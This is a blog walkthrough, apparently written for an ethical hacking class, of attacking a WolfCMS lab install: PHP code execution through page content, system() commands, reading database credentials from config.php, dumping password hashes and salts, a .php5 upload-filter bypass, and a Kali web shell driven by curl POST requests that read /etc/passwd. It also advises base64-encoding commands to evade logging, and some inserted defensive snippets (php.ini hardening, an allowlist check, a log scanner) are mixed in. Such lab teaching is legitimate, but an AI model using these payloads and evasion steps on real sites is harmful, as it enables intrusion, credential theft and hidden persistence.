Wednesday, November 8, 2017

Docker with WolfCMS and MySQL Images - Command Injection and Web Shells

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub images to refresh my knowledge on the tools that can be used.  Also, to provide step-by-step walk-through exercises that students can follow.

Previous Posts that can assist with this Walkthrough
1. Billu_b0x - Highlights a Local File Inclusion vulnerability
2. Seattle - Highlights Brute Forcing a Login and XSS
3. Zico2 - Highlights directory traversal and PHP Command Injection
4. Docker with WolfCMS and MySQL Images - Prerequisite for this post...

Tools Used:
VMware Workstation 12 Player
PuTTY or SSH client on host computer
Kali Linux Distro VM (Downloaded the VM edition from kali.org)

1 - docker
2 - docker image called wolfcms/wolfcms
3 - docker image called mysql
4 - Create a MySQL user and Set a password for MySQL user

Disclosure of the vulnerabilities listed below: I disclosed them to WolfCMS on November 4, 2017 and November 13, 2017.  I have received no response from them.

Lab
1. After loading the docker images from the last post for MySQL and WolfCMS, the configuration for WolfCMS was retained; however, the MySQL configuration and information were not retained.

2. Follow the previous lab to set up MySQL, or find a different image so that when you commit the changes they are retained.  You can pull down an ubuntu image and run "apt-get update; apt-get install net-tools mysql-server zip wget".

3. After you log in as the admin from the URL http://172.17.0.2/?/admin/login you should see the following page.  For now we are going to work with the "About Us" page.


4. Knowing from the setup of the web site that it is written in PHP, we are going to try to get PHP code to execute in the body of this "About Us" page.

String: <?php echo "test"; ?>



5.  Notice that the "About Us" page interprets the PHP and returns the word "test".  Sweet!


6. I am going to try running system commands, capturing the output and displaying it on the "About Us" page.  The system() function ought to be disabled.

Strings:
<?php
echo "\n\nLocal Info\n\n";
echo '<pre>';
system('pwd');      // present working directory
system('whoami');   // user the web server runs as
system('ls -lha');  // listing of that directory
echo '</pre>';
?>



7. Wow! That worked: it pulled back the present working directory (pwd), the user the web server is running as (whoami), and the listing of the current directory (ls -lha).  We can execute shell commands through PHP as long as the www-data user has permission to do so.
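The check a defender would make at this point, added here as an illustration and not from the original post: the php.ini directive that disables the shell-spawning functions, shown with the permissive default beside a hardened value. The directive name is real; the hardened list is a suggested value and not WolfCMS's own configuration.

```ini
; php.ini (or the PHP config inside the container) - default: nothing disabled
disable_functions =

; hardened: PHP running as www-data can no longer spawn a shell through these
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
```

This stops system() but not PHP execution itself: steps 8 to 16 below (reading config.php and querying the database) still work, because they use file and database functions rather than a shell.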


8. Normally in a configuration file you can find a username and password for the database.  Let's try to get the contents of the config.php file by adding a command to cat it.

String: system('cat /var/www/html/wolfcms/config.php');


9. Looking at the "About Us" page for the output shows that it probably did not work.


10. Let's check the source of the page by right-clicking on the page and clicking "View Source".  Notice that config.php is actually visible (the browser does not render the file's <?php ... ?> block, so it only shows up in the source).  We can quickly see that the database username and password are displayed.

11. We have the database credentials and we can execute PHP.  Let's explore the database using this information by adding the following PHP code, which connects to the database and returns the tables in the database "wolf".



12. And the results are...


13. Let's now look inside the user table, but first let's display the columns of the table.


14. And the results of the fields in the table user...

15. Now let's display the name, email, username, password and salt.

16.  The results are displaying the password and the salt.


17.  Now with the above vulnerabilities you have full access to run any command you like on the file system with the permissions of the www-data user and full access to the database.  Remember, with PHP code execution you can insert and update records.

18.  Really quick, stored XSS exists on this page also.



19. The above vulnerabilities allow us to execute operating system commands, steal cookies with stored XSS, query the database and much more.  To understand attackers, though: if the database does not contain information that they can sell, they look for a way to be persistent and use the site in other ways.  One way they gain persistence is through a web shell, which allows them to execute commands and gather the results.  For this first exercise we are going to upload a simple web shell.  Navigate to the file manager.


20. On Kali, under the directory /usr/share/webshells/php is a file called simple-backdoor.php.  If you read about this latest update, you see that PHP file extensions were blocked from being uploaded.  If you attempt to upload simple-backdoor.php it will fail and not complete.  Sometimes as a penetration tester you need to look at the source code.


In the source code, you can see that the blocked extensions are .php, .php3, .php4 and .inc.  However, if you try the other extensions PHP can be served under, you will find that .php5 is not blocked.  You can copy simple-backdoor.php to simple-backdoor.php5 and the upload will succeed.

Command: cp /usr/share/webshells/php/simple-backdoor.php /usr/share/webshells/php/simple-backdoor.php5
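The two upload checks side by side, as an added example written in Python rather than the project's PHP and not WolfCMS's own code: the blocklist exactly as the page describes it (.php, .php3, .php4, .inc) and an allowlist alternative. The allowed set is an assumption.

```python
import os

# Extensions the WolfCMS upload filter on this page rejects (its blocklist).
BLOCKED_EXTS = {"php", "php3", "php4", "inc"}

# Hardened alternative (an assumption, not the project's code): only these may be uploaded.
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

def blocklist_allows(filename):
    """The page's logic: reject only when the final extension is on the blocklist."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in BLOCKED_EXTS

def allowlist_allows(filename):
    """Hardened logic: every dotted segment after the base name must be on the allowlist,
    compared case-insensitively, so an unlisted extension anywhere in the name is rejected."""
    segments = os.path.basename(filename).lower().split(".")
    if len(segments) < 2 or not segments[0]:
        return False  # no extension at all, or a dotfile
    return all(seg in ALLOWED_EXTS for seg in segments[1:])

# The file from step 20: the blocklist lets it through, the allowlist does not.
if __name__ == "__main__":
    for name in ("simple-backdoor.php", "simple-backdoor.php5", "photo.jpg"):
        print(name, blocklist_allows(name), allowlist_allows(name))
```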


21. Before you upload the simple-backdoor.php5 file you should look at the source code and understand what it is going to do.  If you navigate to the file that you uploaded you will see the following in the browser.

22. The web shell allows you to execute any command that the www-data user has the privileges to run.  I am going to run the command as shown to display the contents of the /etc/passwd file.



23. Remember that if you pass parameters in the URL, the parameters will appear in the logs.  I am going to modify the backdoor script to read a POST parameter.  I copied it to sb-post.php5 and then uploaded it.


24. Now if you browse to the page you will not see anything showing in the page.  I am going to use curl to conduct a POST request with the command that I would like to execute.

Command: curl -d "cmd=ls" -X POST http://172.17.0.2/public/sb-post.php5


25. With the above backdoor I can return the output of the commands that I would like to execute.  Remember that you can chain commands together also.

Command: curl -d "cmd=whoami;ls -lha;cat /etc/passwd" -X POST http://172.17.0.2/public/sb-post.php5 
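Detection logic for the traffic in steps 22 to 25, as an added example that is not part of the original post: a scanner over constructed Apache access-log lines that flags any request for a PHP-executable file under the upload directory, whether or not a command is visible in the URL. The /public/ path and the blocked extension list come from this walkthrough; the log format, the sample lines and the assumption that the handler executes .php5 are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Apache common/combined log: client ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+')

# Extensions the upload filter on this page blocks (.php, .php3, .php4, .inc) plus .php5,
# which it misses. Assumption: the server's PHP handler executes all of them.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "inc"}
UPLOAD_DIR = "/public/"  # WolfCMS upload directory as used in this walkthrough

def has_executable_ext(path):
    """True if any dotted segment of the file name is a PHP-executable extension."""
    name = path.rsplit("/", 1)[-1].lower()
    return any(seg in EXECUTABLE_EXTS for seg in name.split(".")[1:])

def inspect(line):
    """Reasons a log line is suspicious: [] if clean, None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    reasons = []
    if parts.path.startswith(UPLOAD_DIR) and has_executable_ext(parts.path):
        reasons.append("script requested from upload directory")
    if "cmd" in parse_qs(parts.query):
        reasons.append("cmd parameter in query string")
    if reasons and m.group("method") == "POST":
        reasons.append("POST: argument not logged")  # the body never reaches the access log
    return reasons

def scan(lines):
    """Return [(path, reasons)] for every line that triggers at least one rule."""
    hits = []
    for line in lines:
        reasons = inspect(line)
        if reasons:
            hits.append((urlsplit(LOG_RE.match(line).group("target")).path, reasons))
    return hits

# Constructed sample lines modelled on the requests made in this walkthrough.
SAMPLE_LOG = [
    '172.17.0.1 - - [08/Nov/2017:10:00:01 +0000] "GET /?/about-us HTTP/1.1" 200 1234',
    '172.17.0.1 - - [08/Nov/2017:10:00:02 +0000] "GET /public/simple-backdoor.php5?cmd=whoami HTTP/1.1" 200 64',
    '172.17.0.1 - - [08/Nov/2017:10:00:03 +0000] "POST /public/sb-post.php5 HTTP/1.1" 200 98',
    '172.17.0.1 - - [08/Nov/2017:10:00:04 +0000] "GET /public/images/logo.png HTTP/1.1" 200 4096',
]

for path, reasons in scan(SAMPLE_LOG):
    print(path, "->", "; ".join(reasons))
```

The POST variant is caught by the path rule alone, so encoding the body (as in step 26) does not change what this scanner sees; only the command itself stays out of the access log.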



26. With the backdoor you can see that the commands are in plain text.  You may want to find a way to obfuscate them or make the string difficult to identify.  Malware and backdoors often use encryption to hide the commands sent and received.  I am going to use Base64 encoding to pass the commands to the web shell.  First let's modify the web shell to decode a base64 encoded string.



27. Now, using bash to encode the command we want sent and curl to send it, we receive the results.


28. Granted, you probably want the output encoded as you receive it back from the web server as well.

Challenge: Change the output to be base64 encoded.

Challenge: Write a python script that will read as input the command, base64_encode it, send it, receive the results, and decode it.  After this process read as input another command.


